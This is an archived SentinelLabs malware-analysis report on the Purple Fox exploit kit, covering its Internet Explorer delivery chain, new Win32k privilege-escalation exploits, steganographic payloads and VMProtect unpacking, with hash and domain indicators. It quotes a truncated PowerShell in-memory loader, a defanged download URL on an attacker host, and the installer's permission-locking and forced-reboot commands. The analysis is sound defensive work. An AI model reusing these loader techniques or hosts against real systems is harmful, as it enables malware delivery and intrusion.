{
	"id": "34e380d0-f8e4-436e-b9e7-7e8e06f8c151",
	"created_at": "2026-04-06T01:29:52.917451Z",
	"updated_at": "2026-04-10T03:21:30.820765Z",
	"deleted_at": null,
	"sha1_hash": "c373ef5af06e63a9236cb448bb97040127a79eac",
	"title": "Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3180168,
	"plain_text": "Purple Fox EK | New CVEs, Steganography, and Virtualization\r\nAdded to Attack Flow - SentinelLabs\r\nBy Gal Kristal\r\nPublished: 2020-10-19 · Archived: 2026-04-06 00:56:20 UTC\r\nExecutive Summary\r\nIn recent weeks, we have seen a spike in the number of attempts to attack vulnerable versions of Internet\r\nExplorer by actors leveraging the Purple Fox exploit kit.\r\nOur investigations reveal that Purple Fox has iterated to include use of two recent CVEs – CVE-2020-1054\r\nand CVE-2019-0808 – through publicly-available exploit code.\r\nIn addition, we’ve noticed other changes to their attack flow that allow them to better circumvent firewall\r\nprotections and some detection tools by adopting steganography and obscuring malicious code with code\r\nvirtualization technologies.\r\nDuring the last couple of years, Purple Fox has advanced its attack and delivery methods. First observed in\r\nSeptember 2018, subsequent researchers noted that in 2019 Purple Fox dropped use of NSIS (Nullsoft Scriptable\r\nInstall System) and the Rig exploit kit and instead adopted PowerShell to achieve fileless execution. Earlier this\r\nyear, ProofPoint detailed how Purple Fox added CVE-2020-0674 and CVE-2019-1458 to its arsenal. Our research\r\nreveals that the developers have iterated again, adding more CVEs to achieve privilege escalation, as well as\r\nadopting steganographic and virtualization techniques to avoid detection and hamper analysis.\r\nPayload Delivery Flow\r\nhttps://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/\r\nPage 1 of 9\n\nIn the attacks we observed, the victim is directed to a malicious site by advertisements or just by clicking the\r\nwrong URL. The attackers are hosting their malware on speedjudgmentacceleration[.]com and targeting Internet\r\nExplorer users.\r\nThe exploit runs mshta.exe with VBScript code as a command line, which then runs PowerShell. The PowerShell\r\ncode downloads and executes in memory the next stage of code from\r\nhttp[:]//rawcdn[.]githack[.]cyou/up.php?key=1 .\r\nFigure 1: An in-the-wild autonomous detection of the attack by the SentinelOne agent\r\nhttps://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/\r\nPage 2 of 9\n\nThe next stage follows a similar pattern to previous versions of Purple Fox. It first checks whether it is running\r\nwith Administrator privileges or not. If so, it installs an MSI package directly from the attacker’s site as key=2.\r\nOtherwise, it tries several different Local Privilege Escalation exploits to elevate itself first.\r\nNew Privilege Escalation Exploits\r\nIn the latest variant of Purple Fox, the attackers have improved two things.\r\nIn the past, Purple Fox would download local privilege escalation (LPE) binaries that used an image file extension\r\n( update.jpg) but which was in fact a regular executable file. This technique can easily be detected as malicious\r\nby an appropriate firewall rule or security software.\r\nThe new version of the exploit kit now downloads actual image files (key=3 \u0026 key=4) and uses steganography to\r\nembed each LPE in the image. An example of one of the images used is shown below:\r\nAfter download, this is then extracted in memory. The following code is used to decode and run the payload:\r\n$uyxQcl8XomEdJUJd='sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebC\r\nIEX ($uyxQcl8XomEdJUJd)\r\nhttps://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/\r\nPage 3 of 9\n\nFurther, two new exploits are now being utilized to help with local privilege escalation: CVE-2020-1054 and\r\nCVE-2019-0808. Both are kernel exploits in the Win32k component. CVE-2020-1054 was patched as recently as\r\nMay this year. The attacker binaries we discovered exploiting these vulnerabilities were compiled on 11 August\r\n2020 and 10 September 2020, respectively.\r\nThe exploits contain debug information and a lot of informative strings. For example, the debug path on CVE-2020-1054 is:\r\nD:PersonalWindowsWindows10DesktopCVE-2020-1054-masterCVE-2020-1054-masterx64ReleaseCVE-2020-1054.pdb\r\nAs the folder name where it was compiled suggests, the code was taken from a Git repository. We were able to\r\nquickly trace the exploits to these public repositories: CVE-2020-1054, CVE-2019-0808.\r\nUnfortunately, searching for more binaries in the wild with similar traits has so far yielded no results.\r\nIt is worth noting that all of the scripts check for a specific and consistent registry value named “StayOnTop”\r\nunder HKCUSoftware7-Zip. It appears that setting this value enables the malware to determine if the payload ran\r\nsuccessfully. Therefore, finding this value in a computer’s registry indicates compromise by Purple Fox.\r\nRootkit Payload\r\nThe purpose of the PowerShell scripts and privilege escalation exploits is ultimately to install a rootkit on the\r\nmachine. The rootkit’s installation process and capabilities have already been described in detail by other\r\nresearchers; however, in light of the changes we discovered, we wanted to check whether there were any new\r\ndevelopments with regard to the payload, too.\r\nWe found two versions of their malware referenced in the new domain, both of which are MSI installers of the\r\nrootkit. One of these has missing files; however, our analysis of the complete one had some interesting surprises.\r\nThe installation process remains mostly the same. We still see the use of PendingFileRenameOperations for\r\nplacing the files under the system32 directory after a reboot. However, the CustomAction table in the MSI\r\npackage has vbscript code that among other things, runs the following:\r\nvbs.Run \"takeown /f %windir%system32jscript.dll\",0,True\r\nvbs.Run \"cacls %windir%system32jscript.dll /E /P everyone:N\",0,True\r\nvbs.Run \"takeown /f %windir%syswow64jscript.dll\",0,True\r\nvbs.Run \"cacls %windir%syswow64jscript.dll /E /P everyone:N\",0,True\r\nvbs.Run \"takeown /f %windir%system32cscript.exe\",0,True\r\nvbs.Run \"cacls %windir%system32cscript.exe /E /P everyone:N\",0,True\r\nvbs.Run \"takeown /f %windir%syswow64cscript.exe\",0,True\r\nvbs.Run \"cacls %windir%syswow64cscript.exe /E /P everyone:N\",0,True\r\nvbs.Run \"powershell Start-Sleep -Seconds 900; Restart-Computer -Force\",0,false\r\nWhat’s interesting here is that these commands are straight from Microsoft’s advisory about how to defend against\r\nthe CVE-2020-0674 vulnerability (Internet Explorer RCE), which is used by Purple Fox to gain inital access. We\r\nhttps://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/\r\nPage 4 of 9\n\nsurmise that the purpose of protecting the newly infected machine from that vulnerability may be to keep out rival\r\nattackers.\r\nAfter extracting the malware from the MSI package, we noticed that the payload also has a significant new\r\nfeature: it is now protected by VMProtect.\r\nUse of VMProtect is easy to observe from the PE’s section table:\r\nFigure 2: Entry point in a “.vmp%d” section is a clear indication of VMProtect\r\nThis makes reversing more difficult as it employs a number of techniques to hide the original code and obfuscate\r\nit.\r\nUnpacking VMProtect\r\nThere are two primary obstacles to overcome when reversing VMProtected binaries: the packed data and the\r\nvirtualized instructions.\r\nWe first have to unpack the data inside the binary. To do that we used the awesome x64dbg and opened the file.\r\nAfter that, we put a breakpoint on the start of the VirtualProtect function:\r\nWe want to log all the calls to that function, so we enter in the “Log Text” box:\r\nVirtualProtect: lpAddress={a:[esp+4]}, dwSize={d:[esp+8]}, flNewProtect={x:[esp+C]} ;\r\nRunning it until it crashes gives this output:\r\nhttps://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/\r\nPage 5 of 9\n\nVirtualProtect: lpAddress=x86_pf.00401000, dwSize=153444, flNewProtect=40 ;\r\nPAGE_EXECUTE_READWRITE\r\nVirtualProtect: lpAddress=x86_pf.00427000, dwSize=1032, flNewProtect=40 ;\r\nPAGE_EXECUTE_READWRITE\r\nVirtualProtect: lpAddress=x86_pf.0047D000, dwSize=76, flNewProtect=4 ;\r\nVirtualProtect: lpAddress=x86_pf.0047E000, dwSize=68, flNewProtect=4 ;\r\nVirtualProtect: lpAddress=x86_pf.00401000, dwSize=153444, flNewProtect=20 ;\r\nPAGE_EXECUTE_READ\r\nVirtualProtect: lpAddress=\"ƒ-\", dwSize=1032, flNewProtect=20 ;\r\nVirtualProtect: lpAddress=x86_pf.0047D000, dwSize=76, flNewProtect=2 ;\r\nWe can see that the data is probably unpacked to virtual address 0x401000 , so we’ll want to watch that address\r\nuntil data is written there.\r\nAfter restarting the program, we again put a breakpoint on VirtualProtect, and let the breakpoint hit eight times.\r\nThen, we set the EIP to that address and use x64dbg’s builtin Scylla plugin to dump the binary and fix its imports:\r\nhttps://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/\r\nPage 6 of 9\n\nThis gives us a much smaller, debuggable DLL file with plenty of plaintext strings to help us investigate the\r\nmalware.\r\nThe DLL’s code is still obfuscated using virtualized calls, but fortunately for us we found this in the strings:\r\nHid_State\r\nHid_StealthMode\r\nHid_HideFsDirs\r\nHid_HideFsFiles\r\nHid_HideRegKeys\r\nHid_HideRegValues\r\nHid_IgnoredImages\r\nHid_ProtectedImages\r\nhttps://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/\r\nPage 7 of 9\n\nThis is similar to previously reported versions of their rootkit, which is just a public rootkit that they downloaded\r\nand compiled. From this information, we deduce that they haven’t substantially upgraded their capabilities in the\r\nrootkit.\r\nConclusion\r\nThe Purple Fox exploit kit is under active development. As we’ve seen since September 2018 and again in our\r\nresearch, the malware authors are keeping up with Microsoft patches in order to target those vulnerabilities that\r\norganizations and security teams fail to patch in a timely manner by leveraging publicly-available exploit code.\r\nThis new variant also improves its ability to evade detection by adopting steganography to hide LPE binaries and\r\nmakes use of commercially available software to protect its code from analysis.\r\nIndicators of Compromise\r\nSHA1\r\nc82fe9c9fdd61e1e677fe4c497be2e7908476d64 CVE-2019-1458.exe\r\ne43f98c0698551f997649c75a2bfe988f72060c0 CVE-2020-1054.exe\r\n82af45d8c057ef0cf1a61cc43290d21f37838dd1 cve_2019_0808.exe\r\n6cac8138f1e7e64884494eff2b01c7b1df83aef2 rootkit_from_cve_2019_0808.msi\r\ne65c1a74275e7099347cbec3f9969f783d6f4f7d cve_2019_0808.ps1\r\nbdeed6792463713806f39c3b5abc0d56f176e88f key1.bin\r\n921d1beb3c48b03e20ba1ea07ea1c8f8fc97ec8e key2.bin\r\n2c5c07c969dd715d0e696f8a8e9e6754a9114d4e key3.bin\r\n5a680f659c91870a819ede06746f21282a4929d1 key4.bin\r\n60f2624c39f61ec6c2eff09d463ca57d9a227b9b key5.bin\r\nbd00f0e6e8cbe0b486fe0aad9e6e38ea606f7044 key6.bin\r\n9ba5e84fccf1012343ba72e9584c6af3beb8b361 key7.bin\r\n57b4eac452c2e8c73222d0915a97a63b43d391de key8.bin\r\n57b4eac452c2e8c73222d0915a97a63b43d391de key9.bin\r\nc21b1397d25ece8221e981eb5289c592f71ab4ca rootkit_encrypted_payload\r\n0470d80daf464b5ea5ee80e2db18e0582f6dbfaf rootkit_x86\r\nbc9766d405913a6162d3747a5a7d0afe1857ac88 rootkit_x64\r\nSHA256\r\n079c13fbc30a32e4f0386cd53c56d68404961b8f1cd4d4fde1a1e9def42aa557 CVE-2019-1458.exe\r\n7465b738ba31fa2fff7fef1d770ef32e43b01d49a937b3b1c11dc2e4e45fd019 CVE-2020-1054.exe\r\nbabfd8e70102479dea4f239c1ee5de463af07c73a94592b390257c5b3d2878a9 cve_2019_0808.exe\r\n9208e853d6de61f1640822ae723e0d40730e29cef5a660419b95fd32c84c9ade rootkit_from_cve_2019_0808.msi\r\ne30d7375f5f88847b810755f0a2cda82e8eeb084a3b989c85d6f13f6a1c01f38 cve_2019_0808.ps1\r\nb48c61983f2d453d4d6a5ff1f2c9e0e194d7ae892a2649d7bafd267082033748 key1.bin\r\n49d9f5aaeb6fd10d371afbebf33ffed184b22e66350a12a60cbbe34ff1fadf9e key2.bin\r\n8392f7bc7bd93ab035e609619e0915b7e8c91288fc6eb19237c0e2019f8dcaa2 key3.bin\r\n13b0e2769d7a0b3964c4e491f90fc4518f8e5ae4d8c37082ffe764b3a174e9a7 key4.bin\r\nhttps://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/\r\nPage 8 of 9\n\n6bee844cdd424c970ff8bba22385ae4c1ae51c2b4e036ba1a217ba37e100530f key5.bin\r\ne49327a62e4500ac23fa0b506c565350fbc9afd497198a8b4b8ae8f537146d53 key6.bin\r\n321eeafe6a9dbd424bf9fdf7ded1ef18c7cab68fadb58cd0da5a1c74479a509f key7.bin\r\n01662ffa9a1c637307e1d148ac2492c69d6035ca87424cbb11e44a178002abc4 key8.bin\r\n01662ffa9a1c637307e1d148ac2492c69d6035ca87424cbb11e44a178002abc4 key9.bin\r\ncfae7a1935f0aaf0f76322f29ad0e0fd1a77d325e55fa324a0bb19e264760800 rootkit_encrypted_payload\r\n181551603ebebbf5924247212c0ed93b6c9c4b088e612bf04f5996c227563318 rootkit_x86\r\n1209aece1f9f54e6422083791eb8a59df878f6959beae9e53736e3056459ab1e rootkit_x64\r\nDomains\r\nspeedjudgmentacceleration[.]com\r\nrawcdn[.]githack[.]cyou\r\ndl[.]gblga[.]workers.dev\r\ndl[.]fmhsi[.]workers.dev\r\nSource: https://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/\r\nhttps://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/"
	],
	"report_names": [
		"purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow"
	],
	"threat_actors": [],
	"ts_created_at": 1775438992,
	"ts_updated_at": 1775791290,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c373ef5af06e63a9236cb448bb97040127a79eac.pdf",
		"text": "https://archive.orkl.eu/c373ef5af06e63a9236cb448bb97040127a79eac.txt",
		"img": "https://archive.orkl.eu/c373ef5af06e63a9236cb448bb97040127a79eac.jpg"
	}
}